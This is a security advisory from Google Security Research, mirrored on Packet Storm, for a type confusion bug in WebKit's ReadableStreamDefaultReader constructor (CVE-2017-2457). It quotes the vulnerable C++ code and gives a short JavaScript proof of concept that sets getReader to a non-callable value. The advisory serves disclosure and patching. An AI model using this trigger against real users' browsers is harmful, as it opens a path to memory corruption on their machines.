Lucene search

K
packetstormGoogle Security ResearchPACKETSTORM:141966
HistoryApr 09, 2017 - 12:00 a.m.

WebKit constructJSReadableStreamDefaultReader Type Confusion

2017-04-0900:00:00
Google Security Research
packetstormsecurity.com
51

0.114 Low

EPSS

Percentile

94.7%

` WebKit: Type confusion in constructJSReadableStreamDefaultReader   
  
CVE-2017-2457  
  
  
EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)  
{  
VM& vm = exec.vm();  
auto scope = DECLARE_THROW_SCOPE(vm);  
  
JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));  
if (!stream)  
return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");  
  
JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1  
  
CallData callData;  
CallType callType = getCallData(jsFunction, callData);  
MarkedArgumentBuffer noArguments;  
return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));  
}  
  
It doesn't check whether |getReader| is callable or not.  
  
PoC:  
  
let rs = new ReadableStream();  
let cons = rs.getReader().constructor;  
  
rs.getReader = 0x12345;  
new cons(rs);  
  
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, <a href="https://crrev.com/210800" title="" class="" rel="nofollow">r210800</a>)  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`